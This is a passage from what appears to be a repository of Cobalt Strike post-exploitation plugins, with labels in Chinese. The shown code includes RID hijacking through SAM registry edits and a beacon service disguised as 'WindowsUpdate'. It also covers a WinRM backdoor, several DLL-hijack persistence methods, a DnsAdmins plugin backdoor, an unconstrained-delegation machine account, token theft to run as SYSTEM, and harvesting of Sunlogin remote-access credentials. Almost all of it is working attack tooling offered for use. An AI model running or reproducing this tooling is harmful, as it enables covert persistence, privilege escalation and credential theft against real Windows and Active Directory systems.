HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1 17] 8 | HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5 [1 17]" 9 | $inipath=$PWD.Path+"\a.ini" 10 | [System.Io.File]::WriteAllText($inipath,$inidata) 11 | write-host "Edit HKLM\SAM ACL" 12 | regini $inipath 13 | reg export 'HKLM\SAM\SAM\Domains\Account\Users\000001F5' .\export.reg /y 14 | $calc=0 15 | $rid="XXXXXXXXXXXX" 16 | $rid_="" 17 | for($x=0;$x -lt $rid.Length;$x++){ 18 | $rid_+=$rid[$x] 19 | if($x%2 -eq 1){ 20 | $rid_+="," 21 | } 22 | } 23 | $rid_=$rid_.TrimEnd(",") 24 | $number=$rid.length/2-1 25 | $path=$PWD.Path+"\export.reg" 26 | $data=(Get-Content $path -TotalCount 7)[-2] 27 | $datas=$data -split "," 28 | $yuan=[System.String]::Join(",",$datas[0..$number]) 29 | $xg=$data -replace $yuan," $rid_" 30 | $filecontent=[System.IO.File]::ReadAllText($path) 31 | $xg2=$filecontent.Replace($data,$xg) 32 | [System.Io.File]::WriteAllText($path,$xg2) 33 | reg import .\export.reg 34 | write-host "Rid Hijack Sucess" 35 | Remove-Item $inipath 36 | Remove-Item $path -------------------------------------------------------------------------------- /权限维持/ridquery.ps1: -------------------------------------------------------------------------------- 1 | $data=Get-WmiObject -Class Win32_UserAccount | Select-Object Name,SID 2 | foreach($n in $data){ 3 | $username=$n.Name 4 | $sid=$n.SID -split "-" 5 | $sid=[Convert]::ToString($sid[-1],16) 6 | $number=$sid.Length%2 7 | if($number -eq 1){ 8 | $rid="0"+$sid 9 | $rid=[System.String]::Join("",$rid[-2..-1]+$rid[0..1]) 10 | } 11 | write-host "Name:"$username "Sid:"$sid "Rid:"$rid 12 | } -------------------------------------------------------------------------------- /权限维持/service_c2.cna: -------------------------------------------------------------------------------- 1 | sub servicerun{ 2 | $exename = $3["exename"]; 3 | $data = artifact_payload("$3['listener']", "svcexe", "$3['arch']"); 4 | $handle = openf(">$exename"); 5 | writeb($handle, $data); 6 | closef($handle); 7 | btask($3["bid"], "生成服务马,Listener:$3['listener'] 位数:$3['arch'] 保存名称:$exename"); 8 | bupload($3["bid"], script_resource($exename)); 9 | bmv($3['bid'], $exename, $3["uploadoutpath"].$exename); 10 | btask($3["bid"], "上传到$3['uploadoutpath']"); 11 | $command = "sc create WindowsUpdate binPath= ".$3['uploadoutpath'].$exename." start= auto obj= LocalSystem DisplayName= windowsupdate"; 12 | btask($3["bid"], "run $command"); 13 | bshell($3["bid"], $command); 14 | btask($3["bid"], "Query WindowsUpdate Service"); 15 | bshell($3["bid"], "sc qc WindowsUpdate"); 16 | btask($3["bid"], "Run WindowsUpdate Service"); 17 | bshell($3["bid"], "sc start WindowsUpdate"); 18 | } 19 | 20 | sub winrm_set{ 21 | if ($3['bid']) { 22 | btask($bid ,"setting winrm"); 23 | bshell($bid, "winrm quickconfig -q"); 24 | bshell($bid, 'winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}'); 25 | bshell($bid, "winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port=\"$3['port']\"}"); 26 | bshell($bid, "winrm set winrm/config/Client @{TrustedHosts=\"*\"}"); 27 | btask($bid, "winrm config"); 28 | bshell($bid, "winrm e winrm/config/listener"); 29 | # btask($bid,"客户端连接使用:winrm quickconfig -q\nwinrm set winrm/config/Client @{TrustedHosts="*"}\nwinrs -r:: -u: -p: \nExample:winrs -r:http://127.0.0.1:80 -u:administrator -p:123456 whoami"); 30 | }else{ 31 | berror($3['bid'], "Not an administrator"); 32 | } 33 | } 34 | 35 | sub winrm_config{ 36 | $dialog = dialog("Winrm config", %(port => "80", bid => $bid), &winrm_set); 37 | dialog_description($dialog, "winrm后门端口设置\nwindows server 2008或以下端口默认为80端口(端口复用),无法进行修改"); 38 | drow_text($dialog, "port", "port:"); 39 | dbutton_action($dialog, "run"); 40 | dialog_show($dialog); 41 | } 42 | 43 | 44 | sub usbhistory{ 45 | bpowerpick($bid, "Get-ItemProperty -Path HKLM:\\SYStem\\CurrentControlSet\\Enum\\USBSTOR\\*\\* | Select FriendlyName"); 46 | } 47 | 48 | sub checkdomain{ 49 | btask($bid, "test"); 50 | bpowerpick($bid, "\$time=net time /domain;if(\$time -eq \$null){write-host \"机器不在域内\"}else{write-host \"机器在域内\";[System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties()}"); 51 | } 52 | 53 | sub deviceget{ 54 | bshell($bid, "wmic logicaldisk get deviceid,FileSystem"); 55 | } 56 | 57 | sub getinstall{ 58 | bshell($bid, "wmic product get name"); 59 | } 60 | 61 | 62 | sub getosinfo{ 63 | bshell($bid, "wmic os get name,Version,OSArchitecture"); 64 | } 65 | 66 | 67 | sub nicconfiginfo{ 68 | bshell($bid, "wmic NICCONFIG get Description,IPAddress,IPSubnet,MACAddress,DHCPServer"); 69 | } 70 | 71 | 72 | sub computergetinfo{ 73 | bshell($bid, "wmic COMPUTERSYSTEM get UserName,Workgroup,SystemFamily"); 74 | bshell($bid, "wmic cpu get Name,AddressWidth"); 75 | bshell($bid, "wmic MEMORYCHIP get PartNumber,Capacity,Speed"); 76 | } 77 | 78 | sub usergetinfo{ 79 | bshell($bid, "wmic USERACCOUNT get Name,Domain,SID,Disabled,PasswordChangeable,PasswordRequired"); 80 | } 81 | 82 | sub groupgetinfo{ 83 | bshell($bid, "wmic group get Description,Name,SID"); 84 | } 85 | 86 | sub msdtc_config{ 87 | $dll = $3['file']; 88 | $name = split("\\\\", $dll); 89 | $dllname = $name[-1]; 90 | $dllname_w = $3['file2']."\\\\oci.dll"; 91 | foreach $id ($bid){ 92 | if(-isadmin $id){ 93 | btask($id, "配置msdtc dll劫持"); 94 | bshell($id, "sc stop msdtc"); 95 | bshell($id, "del C:\\Windows\\System32\\oci.dll /F"); 96 | bupload($id, $dll); 97 | bmv($id, $dllname, $dllname_w); 98 | bshell($id, "sc config msdtc start= auto"); 99 | bshell($id, "sc config msdtc obj= LocalSystem"); 100 | bshell($id, "sc start msdtc"); 101 | }else{ 102 | btask($id, "不是Administrator权限"); 103 | } 104 | } 105 | } 106 | 107 | sub msdtc{ 108 | $dialog = dialog("msdtc DLL hijack config", %(file => "",file2 => "C:\\Windows\\System32"), &msdtc_config); 109 | dialog_description($dialog, "msdtc DLL劫持"); 110 | drow_file($dialog, "file", "DLL Path:"); 111 | drow_text($dialog, "file2", "RHOST Path:"); 112 | dbutton_action($dialog, "RUN"); 113 | dialog_show($dialog); 114 | } 115 | 116 | sub dnsadminrun{ 117 | println($3); 118 | $dll = split("\\\\", $3['dllpath'])[-1]; 119 | $dllname = $3['uploadpath']."raj.dll"; 120 | println($3['uploadpath']."raj.dll"); 121 | bupload!($3['bid'], $3['dllpath']); 122 | bmv!($3['bid'], $dll, $dllname); 123 | bshell!($3['bid'], "dnscmd /config /serverlevelplugindll ".$dllname); 124 | bshell!($3['bid'], "sc stop dns"); 125 | bshell!($3['bid'], "sc start dns"); 126 | } 127 | 128 | sub dnsadmin_config{ 129 | foreach $id ($bid){ 130 | $dialog = dialog("DnsAdminConfig", %(uploadpath => "C:\\Windows\\System32\\", bid => $id), &dnsadminrun); 131 | dialog_description($dialog, "DnsAdmins权限维持"); 132 | drow_text($dialog, "uploadpath", "uploadpath:"); 133 | drow_file($dialog, "dllpath", "dllpath:" ); 134 | dbutton_action($dialog, "run"); 135 | dialog_show($dialog); 136 | } 137 | } 138 | 139 | sub CacheTaskExec{ 140 | btask($3['bid'], "CacheTask任务计划COM接口DLL劫持"); 141 | $dllname = split("\\\\", $3['dllpath'])[-1]; 142 | bupload!($3['bid'], $3['dllpath']); 143 | bmv!($3['bid'], $dllname, $3['uploadpath']); 144 | bshell!($3['bid'], "reg add \"HKCU\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32\" /ve /t REG_SZ /d $3['uploadpath']"); 145 | bshell!($3['bid'], "reg add \"HKCU\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32\" /v ThreadingModel /t REG_SZ /d Both") 146 | } 147 | 148 | sub CacheTask{ 149 | foreach $id ($bid){ 150 | $dialog = dialog("CacheTask", %(uploadpath => "C:\\Windows\\Temp\\test.dll", bid => $id), &CacheTaskExec); 151 | dialog_description($dialog, "CacheTask任务计划COM接口DLL劫持,适用系统:Windows 10/Windows Server 2012或以上"); 152 | drow_text($dialog, "uploadpath", "uploadpath:"); 153 | drow_file($dialog, "dllpath", "dllpath:"); 154 | dbutton_action($dialog, "run"); 155 | dialog_show($dialog); 156 | } 157 | } 158 | 159 | 160 | sub servicebeacon{ 161 | foreach $id ($bid){ 162 | $dialog = dialog("ServiceRunBeacon", %(uploadoutpath => "C:\\Windows\\Temp\\", arch => barch($id) ,exename => "svchost.exe", servicename => "WindowsUpdate", bid => $id), &servicerun); 163 | dialog_description($dialog, "生成服务马上传执行,进行权限维持"); 164 | drow_text($dialog, "arch", "arch:"); 165 | drow_text($dialog, "uploadoutpath", "uploadoutpath:"); 166 | drow_text($dialog, "servicename", "servicename:"); 167 | drow_text($dialog, "exename", "outputexename:"); 168 | drow_listener($dialog, "listener", "Listener: "); 169 | dbutton_action($dialog, "run"); 170 | dialog_show($dialog); 171 | } 172 | 173 | } 174 | 175 | sub ridquery{ 176 | $command = "\$data=Get-WmiObject -Class Win32_UserAccount | Select-Object Name,SID 177 | foreach(\$n in \$data){ 178 | \$username=\$n.Name 179 | \$sid=\$n.SID -split \"-\" 180 | \$sid=[Convert]::ToString(\$sid[-1],16) 181 | \$number=\$sid.Length%2 182 | if(\$number -eq 1){ 183 | \$rid=\"0\"+\$sid 184 | \$rid=[System.String]::Join(\"\",\$rid[-2..-1]+\$rid[0..1]) 185 | } 186 | write-host \"Name:\"\$username \"Sid:\"\$sid \"Rid:\"\$rid 187 | }"; 188 | foreach $id ($bid){ 189 | bpowerpick($id, $command); 190 | } 191 | } 192 | 193 | sub ridhijack{ 194 | $handle = openf(script_resource("ridhijack.ps1")); 195 | $data = readb($handle, -1); 196 | closef($handle); 197 | $data = replace($data, "XXXXXXXXXXXX", $3['rid']); 198 | bpowerpick($3['bid'], $data); 199 | } 200 | 201 | 202 | sub ridrun{ 203 | foreach $id ($bid){ 204 | $dialog = dialog("Rid Hijack", %(rid => "f401", bid => $id), &ridhijack); 205 | dialog_description($dialog, "RID劫持,将Guest的RID改为别的用户的RID"); 206 | drow_text($dialog, "rid", "RID:"); 207 | dbutton_action($dialog, "Run"); 208 | dialog_show($dialog); 209 | } 210 | } 211 | 212 | sub lnkreate{ 213 | if (-isFile "test.vbs") 214 | { 215 | deleteFile("test.vbs"); 216 | } 217 | $file = openf(script_resource("lnkcreate.vbs")); 218 | $data = readb($file, -1); 219 | $data = replace($data, "lnkname", $3["lnkname"]); 220 | $data = replace($data, "exename", $3["exename"]); 221 | $data = replace($data, "argsname", $3["argsname"]); 222 | $data = replace($data, "directoryname", $3["directoryname"]); 223 | $data = replace($data, "hostkeyname", $3["hostkeyname"]); 224 | $handle = openf(">test.vbs"); 225 | writeb($handle, $data); 226 | closef($file); 227 | closef($handle); 228 | btask($3["bid"], "Create Vbs,Upload"); 229 | bupload($3["bid"], "test.vbs"); 230 | btask($3["bid"], "Run Vbs"); 231 | bshell($3["bid"], "cscript test.vbs"); 232 | btask($3["bid"], "Check Desktop default.lnk -> dir C:\\Users\\\\Desktop /a | findstr 'default.lnk'"); 233 | brm($3["bid"], "test.vbs"); 234 | } 235 | 236 | sub lnkreateconfig{ 237 | foreach $id ($bid){ 238 | $dialog = dialog("lnk快捷键劫持", %(lnkname => "default.lnk", exename => "cmd.exe", argsname => "/c calc.exe", directoryname => "C:", hostkeyname => "CTRL+C", bid => $id), &lnkreate); 239 | dialog_description($dialog, "参考链接:https://v3ded.github.io/redteam/abusing-lnk-features-for-initial-access-and-persistence"); 240 | drow_text($dialog, "lnkname", "lnkname:"); 241 | drow_text($dialog, "exename", "exename:"); 242 | drow_text($dialog, "argsname", "args:"); 243 | drow_text($dialog, "directoryname", "directory:"); 244 | dbutton_action($dialog, "Run"); 245 | dialog_show($dialog); 246 | } 247 | } 248 | 249 | sub userAccountControlidrun{ 250 | foreach $id ($bid){ 251 | $computername = $3["computername"]; 252 | $computerpass = $3["computerpass"]; 253 | btask($id, "Import Module ActiveDirectory"); 254 | bpowershell($id, "Import-Module ActiveDirectory"); 255 | btask($id, "AddComputer User"); 256 | bpowershell($id, "New-ADComputer -Name $computername -AccountPassword (ConvertTo-SecureString -String \"$computerpass\" -Force -AsPlainText)"); 257 | btask($id, "Set ComputerName:$computername userAccountControl=8192"); 258 | bpowershell($id, "\$ADComputer=Get-ADComputer -Identity $computername\;Set-ADObject -Identity \$ADComputer -Replace @{userAccountControl=8192}"); 259 | bpowershell($id, "Get-ADGroupMember -Identity \"Domain Controllers\""); 260 | blog($id, "computername:$computername computerpass:$computerpass"); 261 | blog($id, "runas /user:\\$computername\$ /netonly cmd"); 262 | } 263 | } 264 | 265 | sub userAccountControlidconfig{ 266 | $dialog = dialog("userAccountControl配置ID设置", %(bid => $bid, computername => "sangfor", computerpass => "sangfor123456"), &userAccountControlidrun); 267 | dialog_description($dialog, "新建机器账户将userAccountControl ID设置为8192。使用于存在于ActiveDirectory模块的机器上执行"); 268 | drow_text($dialog, "computername", "ComputerName:"); 269 | drow_text($dialog, "computerpass", "ComputerPass:"); 270 | dbutton_action($dialog, "Run"); 271 | dialog_show($dialog); 272 | } 273 | 274 | sub javarun { 275 | foreach $id ($bid){ 276 | $path = $3["path"]. "\\". "java.exe"; 277 | $classpath = $3["classpath"]; 278 | $filename = split("\\\\", $classpath)[-1]; 279 | $classname = replace($filename, ".class", ""); 280 | bupload($id, $classpath); 281 | bshell($id, "\"$path\" $classname"); 282 | println("$id $path $classname"); 283 | 284 | } 285 | } 286 | 287 | sub javarunconfig{ 288 | $dialog = dialog("java运行class文件(一般可用于执行shellcode)", %(bid => $bid, path => "", classpath => "", remote => "C:\\Users\\Public"), &javarun); 289 | drow_text($dialog, "path", "JDKPATH:"); 290 | drow_file($dialog, "classpath", "classfilePATH:"); 291 | drow_text($dialog, "remote", "RemoteUploadPath:"); 292 | dbutton_action($dialog, "Run"); 293 | dialog_show($dialog); 294 | } 295 | 296 | 297 | sub tokenrun_{ 298 | foreach $id ($bid){ 299 | bexecute_assembly($id, script_resource("systemcmd_cs.exe"), "$3['Process'] $3['ExecutePath']"); 300 | } 301 | 302 | } 303 | 304 | sub tokenrun{ 305 | $dialog = dialog("tokenrun", %(bid => $bid, Process => "winlogon", ExecutePath => "C:\\Windows\\System32\\cmd.exe"), &tokenrun_); 306 | dialog_description($dialog, " #Process为进程名,ExecutePath为你要运行的EXE路径,如果进程的权限是SYSTEM,提权到SYSTEM杀毒会杀"); 307 | drow_text($dialog, "Process","processname:"); 308 | drow_text($dialog, "ExecutePath", "executepath:"); 309 | dbutton_action($dialog, "Run"); 310 | dialog_show($dialog); 311 | } 312 | 313 | sub csharpaddtask_{ 314 | foreach $id ($bid){ 315 | bexecute_assembly($id, script_resource("addtask.exe"), "$3['taskName'] $3['taskPath']"); 316 | } 317 | } 318 | 319 | sub csharpaddtask{ 320 | $dialog = dialog("addtask", %(bid => $bid, taskName => "360update", taskPath => "C:\\Windows\\System32\\notepad.exe"), &csharpaddtask_); 321 | dialog_description($dialog, " taskName计划任务的名称,taskPath计划任务的目标程序"); 322 | drow_text($dialog, "taskName","taskName:"); 323 | drow_text($dialog, "taskPath", "taskPath:"); 324 | dbutton_action($dialog, "Run"); 325 | dialog_show($dialog); 326 | } 327 | 328 | popup beacon_bottom{ 329 | menu "&权限维持"{ 330 | item "&cs服务马"{ 331 | $bid = $1; 332 | servicebeacon($bid); 333 | } 334 | 335 | item "&winrm后门"{ 336 | $bid = $1; 337 | winrm_config($bid); 338 | } 339 | 340 | item "&msdtc DLL劫持"{ 341 | $bid = $1; 342 | msdtc($bid); 343 | 344 | } 345 | 346 | 347 | item "&WmiPrvSE劫持"{ 348 | show_message("WmiPrvSE提权机会只有一次,失败就没了。一般系统运行只有一个WmiPrvSE.exe进程,当有超过一个WmiPrvSE.exe进程存在时。无法提权"); 349 | WmiPrvSE_config($bid); 350 | } 351 | 352 | item "&CacheTask任务计划COM接口劫持"{ 353 | CacheTask($bid); 354 | } 355 | 356 | menu "&RID劫持"{ 357 | item "&本地windows用户RID查询"{ 358 | ridquery($bid); 359 | } 360 | 361 | item "&RID劫持"{ 362 | ridrun($bid); 363 | } 364 | } 365 | 366 | item "&lnk劫持快捷键" { 367 | lnkreateconfig($bid); 368 | } 369 | 370 | item "&java执行class" { 371 | javarunconfig($bid); 372 | } 373 | 374 | item "&以某个进程的Token运行EXE"{ 375 | $bid = $1; 376 | tokenrun($bid); 377 | } 378 | 379 | item "&内存加载(C#)添加计划"{ 380 | $bid = $1; 381 | csharpaddtask($bid); 382 | } 383 | 384 | menu "&域权限维持" { 385 | item "&dnsadmin后门"{ 386 | $bid = $1; 387 | dnsadmin_config($bid); 388 | } 389 | item "&userAccountControl将ID设置为8192作为后门" { 390 | $bid = $1; 391 | userAccountControlidconfig($bid); 392 | } 393 | } 394 | 395 | } 396 | 397 | } 398 | 399 | sub netsh_exec{ 400 | if ($set eq "port"){ 401 | $lhost = $3['lhost']; 402 | $rhost = $3['rhost']; 403 | $lport = $3['lport']; 404 | $rport = $3['rport']; 405 | foreach $id ($bid){ 406 | btask($id, "端口转发:$lhost : $lport -> $rhost : $rport"); 407 | bshell($id, "netsh interface portproxy add v4tov4 listenport=$lport listenaddress=$lhost connectport=$rport connectaddress=$rhost"); 408 | btask($id, "查看端口转发列表"); 409 | bshell($id, "netsh interface portproxy show all"); 410 | 411 | } 412 | }else{ 413 | $lhost = $3['lhost']; 414 | $lport = $3['lport']; 415 | foreach $id ($bid){ 416 | btask($id, "删除端口转发:$lhost : $lport"); 417 | bshell($id, "netsh interface portproxy delete v4tov4 listenport=$lport listenaddress=$lhost"); 418 | btask($id, "查看端口转发列表"); 419 | bshell($id, "netsh interface portproxy show all"); 420 | } 421 | } 422 | } 423 | 424 | sub netsh_poort{ 425 | $dialog = dialog("netsh Port",%(lhost => "127.0.0.1", rhost => "192.168.1.2", lport => "4444", rport => "4444"), &netsh_exec); 426 | dialog_description($dialog, "netsh端口转发配置\nnetsh端口转发删除"); 427 | if ($set eq "port"){ 428 | drow_text($dialog, "lhost", "LHOST:"); 429 | drow_text($dialog, "rhost", "RHOST:"); 430 | drow_text($dialog, "lport", "LPORT:"); 431 | drow_text($dialog, "rport", "RPORT:"); 432 | }else{ 433 | drow_text($dialog, "lport", "LPORT:"); 434 | drow_text($dialog, "lhost", "LHOST:"); 435 | } 436 | dbutton_action($dialog, "run"); 437 | dialog_show($dialog); 438 | 439 | } 440 | 441 | sub WmiPrvSE{ 442 | $dllname = $3['dll']; 443 | $dllend = split("\\\\", $3['dll'])[-1]; 444 | # println($dllend); 445 | $uploadpath = $3['uploadpath']."\\".$dllend; 446 | # println($uploadpath); 447 | $ps = bps($bid, lambda({ 448 | println($data); 449 | }, $callback => $data)); 450 | foreach $id ($bid){ 451 | btask($id, "WmiPrvSE DLL劫持开始配置"); 452 | if(-isadmin $id){ 453 | btask($id, "当前为管理员权限,杀掉WmiPrvSE.exe进程"); 454 | bshell($id, "taskkill /F /IM WmiPrvSE.exe"); 455 | # btask($id, "重新启动WmiPrvSE.exe进程"); 456 | # bshell($id, "WmiPrvSE.exe"); 457 | } 458 | bupload($id, $dllname); 459 | bmv($id, $dllend, $uploadpath); 460 | bshell($id, "reg delete HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Dnscache\\Performance /F"); 461 | bshell($id, "reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Dnscache\\Performance /F"); 462 | bshell($id, "reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Dnscache\\Performance /v Close /t REG_SZ /d ClosePerfData /F"); 463 | bshell($id, "reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Dnscache\\Performance /v Collect /t REG_SZ /d CollectPerfData /F"); 464 | bshell($id, "reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Dnscache\\Performance /v Library /t REG_SZ /d ".$uploadpath." /F"); 465 | bshell($id, "reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Dnscache\\Performance /v Open /t REG_SZ /d OpenData /F"); 466 | bshell($id, "powershell -c \"Get-WmiObject -List | Where-Object {\$_.Name -Like \"\"Win32_Perf*\"\"\"\"}\""); 467 | } 468 | 469 | 470 | } 471 | 472 | sub WmiPrvSE_config{ 473 | $dialog = dialog("WmiPrvSE_config",%(uploadpath => "C:\\Windows\\Temp"), &WmiPrvSE); 474 | dialog_description($dialog, "WmiPrvSE劫持\n提权适用于:Windows Server 2008\nWindows 7\n或更低版本\n或者用于做权限维持"); 475 | drow_file($dialog, "dll", "dll:"); 476 | drow_text($dialog, "uploadpath", "upload_path:"); 477 | dbutton_action($dialog, "run"); 478 | dialog_show($dialog); 479 | } 480 | 481 | sub GetBeaconId{ 482 | foreach $id ($1){ 483 | return $id; 484 | } 485 | } 486 | 487 | sub SunloginClient{ 488 | btask($1, "向日葵密码解密工具:https://github.com/wafinfo/Sunflower_get_Password"); 489 | btask($1, "向日葵进程检测"); 490 | $processname = "SunloginClient"; 491 | $tasklist = bps($1, lambda({ 492 | global('$pid $name $entry $foundid') 493 | foreach $entry (split("\n", $2)){ 494 | ($name, $null, $pid) = split("\\s+", $entry); 495 | if(lindexOf($name, $processname) ne $null){ 496 | $foundid++; 497 | blog2($1, "\c8$name $pid"); 498 | } 499 | } 500 | if($foundid ne $null){ 501 | btask($1, "向日葵配置文件获取"); 502 | btask($1, "本机验证码参数:encry_pwd\n本机识别码参数:\c3fastcode(去掉开头字母)\n\c3sunlogincode:判断用户是否登录状态\n请判断config.ini配置文件中是否存在\c3sunlogincode参数,存在为登录状态否则未登录"); 503 | btask($1, "安装版向日葵路径:C:\\Program Files\\Oray\\SunLogin\\SunloginClient\\config.ini"); 504 | btask($1, "便携版(绿色版)向日葵路径: C:\\Users\\\\AppData\\Roaming\\Oray\\SunloginClientLite\\sys_lite_config.ini"); 505 | btask($1, "便携版(绿色版)整体配置文件: C:\\ProgramData\\Oray\\SunloginClient\\config.ini") 506 | bshell($1, "type \"C:\\Program Files\\Oray\\SunLogin\\SunloginClient\\config.ini\""); 507 | $currentuser = binfo($1, "user"); 508 | if(lindexOf($currentuser, " *") ne $null){ 509 | $tmp = split(" *", $currentuser); 510 | $tmplen = size($tmp) - 2; 511 | $tmpname = ""; 512 | $calc = 0; 513 | foreach $x ($tmp){ 514 | if($calc ne $tmplen){ 515 | $tmpname .= $x; 516 | $calc++; 517 | } 518 | } 519 | $currentuser = $tmpname; 520 | } 521 | bshell($1, "type \"C:\\Users\\$currentuser\\AppData\\Roaming\\Oray\\SunloginClientLite\\sys_lite_config.ini\""); 522 | bshell($1, "type \"C:\\ProgramData\\Oray\\SunloginClient\\config.ini\""); 523 | btask($1, "向日葵配置注册表信息获取"); 524 | $arch = binfo($1, "arch"); 525 | breg_query($1, "HKU\\.DEFAULT\\Software\\Oray\\SunLogin\\SunloginClient\\SunloginInfo", $arch); 526 | breg_query($1, "HKU\\.DEFAULT\\Software\\Oray\\SunLogin\\SunloginClient\\SunloginGreenInfo", $arch); 527 | } 528 | }, $callback => $2)); 529 | } 530 | 531 | popup beacon_bottom{ 532 | menu "&信息收集"{ 533 | $bid = $1; 534 | item "&usb历史记录信息收集"{ 535 | usbhistory($bid); 536 | } 537 | 538 | item "&判断是否存在域"{ 539 | checkdomain($bid); 540 | } 541 | 542 | item "&获取系统盘符"{ 543 | deviceget($bid); 544 | } 545 | 546 | item "&已安装的软件"{ 547 | getinstall($bid); 548 | } 549 | 550 | item "&系统基本信息获取"{ 551 | getosinfo($bid); 552 | } 553 | 554 | item "&网络信息查询"{ 555 | nicconfiginfo($bid); 556 | } 557 | 558 | item "&配置查询"{ 559 | computergetinfo($bid); 560 | } 561 | 562 | item "&用户查询"{ 563 | usergetinfo($bid); 564 | } 565 | 566 | item "&用户组查询"{ 567 | groupgetinfo($bid); 568 | } 569 | 570 | menu "&netsh"{ 571 | item "&netsh端口转发设置"{ 572 | $set ="port"; 573 | netsh_poort($bid, $port); 574 | } 575 | 576 | item "&netsh端口转发列表查询"{ 577 | foreach $id ($bid){ 578 | bshell($id, "netsh interface portproxy show all"); 579 | } 580 | } 581 | 582 | item "&netsh端口转发删除"{ 583 | $set = "delete"; 584 | netsh_poort($bid, $set); 585 | } 586 | 587 | } 588 | 589 | menu "&常用软件信息收集"{ 590 | item "&向日葵信息收集"{ 591 | SunloginClient(GetBeaconId($bid)); 592 | } 593 | } 594 | } 595 | } 596 | -------------------------------------------------------------------------------- /权限维持/svchost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/svchost.exe -------------------------------------------------------------------------------- /权限维持/systemcmd_cs.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Diagnostics; 7 | using System.Runtime.InteropServices; 8 | 9 | namespace systemcmd_cs 10 | { 11 | class Program 12 | { 13 | [StructLayout(LayoutKind.Sequential)] 14 | internal struct LUID 15 | { 16 | internal int LowPart; 17 | internal int HighPart; 18 | } 19 | 20 | [StructLayout(LayoutKind.Sequential, Pack = 1)] 21 | internal struct TOKEN_PRIVILEGES 22 | { 23 | internal Int32 PrivilegeCount; 24 | internal LUID Luid; 25 | internal Int32 Attributes; 26 | } 27 | 28 | private enum ProcessAccessTypes 29 | { 30 | PROCESS_TERMINATE = 0x00000001, 31 | PROCESS_CREATE_THREAD = 0x00000002, 32 | PROCESS_SET_SESSIONID = 0x00000004, 33 | PROCESS_VM_OPERATION = 0x00000008, 34 | PROCESS_VM_READ = 0x00000010, 35 | PROCESS_VM_WRITE = 0x00000020, 36 | PROCESS_DUP_HANDLE = 0x00000040, 37 | PROCESS_CREATE_PROCESS = 0x00000080, 38 | PROCESS_SET_QUOTA = 0x00000100, 39 | PROCESS_SET_INFORMATION = 0x00000200, 40 | PROCESS_QUERY_INFORMATION = 0x00000400, 41 | STANDARD_RIGHTS_REQUIRED = 0x000F0000, 42 | SYNCHRONIZE = 0x00100000, 43 | PROCESS_ALL_ACCESS = PROCESS_TERMINATE | PROCESS_CREATE_THREAD | PROCESS_SET_SESSIONID | PROCESS_VM_OPERATION | 44 | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_DUP_HANDLE | PROCESS_CREATE_PROCESS | PROCESS_SET_QUOTA | 45 | PROCESS_SET_INFORMATION | PROCESS_QUERY_INFORMATION | STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE 46 | } 47 | 48 | 49 | 50 | public const UInt32 TOKEN_ADJUST_PRIVILEGES = 0x0020; 51 | internal const int SE_PRIVILEGE_ENABLED = 0x00000002; 52 | public const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001; 53 | public const UInt32 TOKEN_DUPLICATE = 0x0002; 54 | public const UInt32 TOKEN_IMPERSONATE = 0x0004; 55 | public const UInt32 TOKEN_QUERY = 0x0008; 56 | 57 | public const UInt32 LOGON_NETCREDENTIALS_ONLY = 0x00000002; 58 | 59 | enum SECURITY_IMPERSONATION_LEVEL 60 | { 61 | SecurityAnonymous, 62 | SecurityIdentification, 63 | SecurityImpersonation, 64 | SecurityDelegation 65 | } 66 | 67 | 68 | enum TOKEN_TYPE 69 | { 70 | TokenPrimary = 1, 71 | TokenImpersonation 72 | } 73 | 74 | 75 | public enum ACCESS_MASK : uint 76 | { 77 | DELETE = 0x00010000, 78 | READ_CONTROL = 0x00020000, 79 | WRITE_DAC = 0x00040000, 80 | WRITE_OWNER = 0x00080000, 81 | SYNCHRONIZE = 0x00100000, 82 | 83 | STANDARD_RIGHTS_REQUIRED = 0x000F0000, 84 | 85 | STANDARD_RIGHTS_READ = 0x00020000, 86 | STANDARD_RIGHTS_WRITE = 0x00020000, 87 | STANDARD_RIGHTS_EXECUTE = 0x00020000, 88 | 89 | STANDARD_RIGHTS_ALL = 0x001F0000, 90 | 91 | SPECIFIC_RIGHTS_ALL = 0x0000FFFF, 92 | 93 | ACCESS_SYSTEM_SECURITY = 0x01000000, 94 | 95 | MAXIMUM_ALLOWED = 0x02000000, 96 | 97 | GENERIC_READ = 0x80000000, 98 | GENERIC_WRITE = 0x40000000, 99 | GENERIC_EXECUTE = 0x20000000, 100 | GENERIC_ALL = 0x10000000, 101 | 102 | DESKTOP_READOBJECTS = 0x00000001, 103 | DESKTOP_CREATEWINDOW = 0x00000002, 104 | DESKTOP_CREATEMENU = 0x00000004, 105 | DESKTOP_HOOKCONTROL = 0x00000008, 106 | DESKTOP_JOURNALRECORD = 0x00000010, 107 | DESKTOP_JOURNALPLAYBACK = 0x00000020, 108 | DESKTOP_ENUMERATE = 0x00000040, 109 | DESKTOP_WRITEOBJECTS = 0x00000080, 110 | DESKTOP_SWITCHDESKTOP = 0x00000100, 111 | 112 | WINSTA_ENUMDESKTOPS = 0x00000001, 113 | WINSTA_READATTRIBUTES = 0x00000002, 114 | WINSTA_ACCESSCLIPBOARD = 0x00000004, 115 | WINSTA_CREATEDESKTOP = 0x00000008, 116 | WINSTA_WRITEATTRIBUTES = 0x00000010, 117 | WINSTA_ACCESSGLOBALATOMS = 